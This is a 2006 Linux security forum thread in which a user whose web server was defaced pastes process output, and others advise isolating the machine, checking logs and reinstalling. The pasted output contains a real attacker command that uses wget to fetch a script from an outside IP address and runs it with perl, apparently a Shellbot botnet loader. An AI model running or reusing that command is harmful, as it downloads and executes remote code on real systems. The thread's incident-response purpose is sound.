LinuxQuestions.org
Visit the LQ Articles and Editorials section
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 05-21-2006, 09:47 AM   #1
dr_angus
LQ Newbie
 
Registered: Sep 2004
Location: Hurricane Country U.S.A.
Posts: 18

Rep: Reputation: 0
i'm hacked


Hi guys,

I was ttying to check my email this morning, when I realized my mail server was down. I go to check my website and see "exlab ownz!" writen on my main page. I restarted my mail server then checked around to see if anything else was damaged. Aparently the punk only changed the index.php, but I'm not sure what else he might have done. I did a "ps -aux" and got:

nobody 2715 0.0 1.9 18268 9692 ? S May20 0:00 /usr/local/apache2/bin/httpd -k start
nobody 2986 0.0 1.9 18212 9684 ? S May20 0:05 /usr/local/apache2/bin/httpd -k start
nobody 2988 0.0 1.9 18340 9864 ? S May20 0:08 /usr/local/apache2/bin/httpd -k start
nobody 3000 0.0 0.0 0 0 ? Z May20 0:00 [sh] <defunct>
nobody 3002 0.0 0.6 7312 3516 ? S May20 0:00 /usr/local/apache/bin/httpd -DSSL
nobody 13238 0.0 0.2 4464 1060 ? S May20 0:00 sh -c wget http://213.251.163.94//squirrelmail/src/ping.txt;mv ping.txt temp2006;perl temp2006
nobody 21173 0.0 2.3 20656 12144 ? S 07:13 0:00 /usr/local/apache2/bin/httpd -k start

some of this stuff seems unusual.

If anybody has any insight on how to stop this down i would apreciate it.
I would also apreciate sugestions on how to prevent this from hapening again.

Thanks
 
Old 05-21-2006, 10:26 AM   #2
dannystaple
Member
 
Registered: Apr 2006
Location: London, Uk
Distribution: Ubuntu on Desktop
Posts: 121

Rep: Reputation: 15
Hmm - I would start by unplugging that network cable. Then I would kill that wget ping.txt process - that looks seriously suspect. I would also delete any of those files it is playing with.

I would then start to examine how they got in - telnet(I hope not), ssh or otherwise. If you have an ssh server, you may want to move it to a less obvious port, and get denyhosts running to tighten it up.

At this point - for the machine that suffered the intrusion, it may be safest to go for a backup, or a clean install and only restore the data files you know should be there. It may not be apparent what other changes have been made, and it is quite likely the script being loaded was one that turned your machine into a zombie that went and performed the same hack on other machines.

You may seriously want to do something like "tail -5000f /var/log/messages" and have a good check of anything suspicious. Also, check the history files for each user on the box, and be wary of any users that shouldnt be there.

Danny
 
Old 05-21-2006, 12:16 PM   #3
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Also take a look at any http logs for anything suspicious, especially errors or urls that contain bash commands (wget, cd, etc). Post anything that looks suspicious. Also what linux version are you running on this box and has it been kept fully updated with security patches/updates?
 
Old 05-22-2006, 08:24 PM   #4
jayjwa
Member
 
Registered: Jul 2003
Location: NY
Distribution: None (src & compile)
Posts: 253

Rep: Reputation: 36
Looks like you where definately defaced, like this: http://www.grewing-edelstahl.de/

You could go ask the guys: irc.gigachat.net, appear to be Brazilian.

PS: Watch out for that rabbit!!

ping.txt: I'm 99% sure is Shellbot. Probably has Squirremail vuln's added in. I've a few I've captured with Mambo and other PHP exploits. It's an IRC bot in Perl, connecting the computer to a botnet (might also be on gigachat). If you had Perl installed, you were/are probably part of a botnet and are now/were scanning for other computers to compromise.

Keep your software up to date, watch a few security mailling lists. Be very leary of running CGI's and letting scripts to do much. I've seen so many servers hacked because someone wrote a poor PHP script that opened up the entire system like a sardine can. My guess is they got in thru a web application, either script, mail system, BB, or whatever you have running.

Pull the plug if you've not already done so; I'd recommend wipe & reinstall, since there's alot of unknowns here.
 
Old 05-27-2006, 08:25 PM   #5
sdexp
Member
 
Registered: Sep 2003
Location: USA
Distribution: Ubuntu Linux
Posts: 103

Rep: Reputation: 15
I agree strongly with the given advice:

Unplug the network cable.

It's the most reasonable thing to do, because it keeps the hackers from putting in any new commands.

Do a clean install of your software afterwords. I suggest the previous methods though. This is only a last resort, and requires most time.
 
  


Reply

Tags
denyhosts, hacking, perl, security, zombie


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Have I been hacked? PAB Linux - Security 3 04-18-2005 06:21 PM
Hacked!! vharishankar General 16 02-07-2005 08:12 AM
Have I been HACKED?? fenice1976 Linux - Software 3 07-05-2004 08:00 PM
am i being hacked? tearinox Linux - Security 5 11-13-2003 06:00 PM
hacked WannaLearnLinux Linux - Newbie 7 10-18-2003 01:34 AM


All times are GMT -5. The time now is 03:41 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration